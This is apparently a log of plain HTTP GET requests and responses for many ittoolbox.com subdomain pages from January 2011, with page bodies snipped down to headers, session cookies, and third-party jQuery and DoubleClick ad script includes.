Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=2053501670?">
GET /documents/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28204
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1615285009?">
GET /events/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1568464939?">
GET /groups/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131235
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/groups;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1367886247?">
GET /research/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96466
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=552739168?">
GET /subscriptions/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1402550479?">
GET / HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56007
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/it.cloud/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=2055110610?">
GET / HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82725
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:39 GMT
Connection: close

GET / HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84329
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/database.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Database;kw=DBMS;kw=RDBMS;kw=DB2;kw=DB2LUW;kw=DB2z%2fOS;kw=microsoftaccess;kw=access;kw=development;kw=dBase;kw=enterpriseDB;kw=microsoftExcel;kw=FilemakerPro;kw=IBMIMS;kw=Informix;kw=Ingres;kw=MySQL;kw=PostgreSQL;kw=QuestToad;kw=SQL;kw=SQLserver;kw=sybase;kw=asp;kw=compliance;kw=projectmanagement;kw=DBMSvendorselection;kw=masterdatamanagementvendorselection;kw=system;kw=developer;kw=hosting;kw=administration;kw=migration;kw=management;kw=server;kw=software;sz=728x90,468x60,1x1;tile=6;ord=2021326666?">
GET / HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60090
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/datacenter.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=578106909?">
GET / HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72791
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/dw.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ELT;kw=extract;kw=load;kw=transform;kw=datawarehouse;kw=datamart;kw=dataappliance;kw=AbInitio;kw=Informatica;kw=DataStage;kw=Teradata;kw=Hyperion;kw=datawarehouseadministration;sz=728x90,468x60,1x1;tile=6;ord=561045215?">
GET / HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71618
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close

GET / HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:43 GMT
Connection: close

GET / HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74629
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:46 GMT
Connection: close
GET / HTTP/1.1
Host: finance.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81717
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Finance Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/finance.toolbox.com/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1222312195?">
GET / HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/hardware.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=hardware;kw=cpu;kw=processors;kw=diskdrives;kw=usb;kw=firewire;kw=memory;kw=storage;kw=motherboards;kw=power;kw=supply;kw=routers;kw=modems;kw=network;kw=security;kw=displays;kw=monitors;kw=graphics;kw=cards;kw=gaming;kw=keyboards;kw=peripheral;kw=pccards;kw=printers;kw=scanners;kw=speakers;kw=audio;kw=webcams;kw=video;kw=laptops;kw=mainframe;kw=servers;kw=tablets;kw=handheld;kw=workstations;kw=virtualization;kw=storage;kw=solidstatedrives;kw=media;kw=servers;kw=dell;kw=apple;kw=hp;kw=ibm;kw=intel;kw=pc;kw=sun;kw=blades;kw=datacenters;kw=pdsa;kw=desktops;kw=;sz=728x90,468x60,1x1;tile=6;ord=1525988634?">
GET / HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54154
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:00 GMT
Connection: close
GET /groups/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
GET / HTTP/1.1
Host: java.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59140
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:01 GMT
Connection: close
GET / HTTP/1.1
Host: knowledgemanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/km.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=knowledge;kw=management;kw=km;kw=exchange;kw=office;kw=sharepoint;kw=systemcenter;kw=communication;kw=collaboration;kw=document;kw=management;kw=content;kw=archiving;kw=authoring;kw=publishing;kw=indexing;kw=sharing;kw=information;kw=webcontent;kw=workflow;kw=e-learning;kw=suites;kw=conferencing;kw=droopal;kw=joomla;kw=wordpress;kw=blackboard;kw=imaging;kw=instantmessenger;kw=adobe;kw=hp;kw=oracle;kw=filenet;kw=streamserve;kw=ibm;kw=jetforms;kw=opentext;kw=vignette;kw=performance;kw=businessintelligence;kw=;sz=728x90,468x60,1x1;tile=6;ord=1347365883?">
GET / HTTP/1.1
Host: linux.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72604
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Linux;kw=Ubuntu;kw=Fedora;kw=RedHat;kw=RHEL;kw=Debian;kw=GNOME;kw=GNU;kw=KDE;kw=kernel;kw=mandriva;kw=mandrake;kw=security;kw=administration;kw=slackware;kw=SUSE;kw=Turbolinux;kw=xwindow;kw=centos;kw=server;kw=software;kw=free;kw=enterprise;kw=hosting;sz=728x90,468x60,1x1;tile=6;ord=660989816?">
GET / HTTP/1.1
Host: networking.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 91759
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:14 GMT
Connection: close
GET / HTTP/1.1
Host: oracle.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/oracle.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Oracle;kw=OracleCorporation;kw=OracleCRM;kw=OracleDatabase;kw=OracleT-SQL;kw=OracleSCM;kw=OracleERP;kw=SunMicroSystems;kw=Siebel;kw=PeopleSoft;kw=JDEdwards;kw=Retek;kw=AgileSoftwareCorporation;kw=OracleApplications;kw=OracleSoftware;kw=OracleSolutions;kw=OLAP;kw=OracleApplicationServers;kw=OracleBI;kw=OracleJDeveloper;kw=OracleGrid;sz=728x90,468x60,1x1;tile=6;ord=1367833762?">
GET / HTTP/1.1
Host: peoplesoft.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:21 GMT
Connection: close

GET / HTTP/1.1
Host: pragdave.pragprog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET / HTTP/1.1
Host: projectmanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ProjectManagement;kw=PMO;kw=PMP;kw=PM;kw=Agile;kw=PMBOK;kw=ProjectLifecycleManagement;kw=Scrum;kw=MSProject;kw=Visio;kw=ProjectManagemnetCareer;kw=RUP;kw=ProjectMethodology;kw=projectmanagementsoftware;sz=728x90,468x60,1x1;tile=6;ord=1730388164?">
GET / HTTP/1.1
Host: sap.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 83566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script 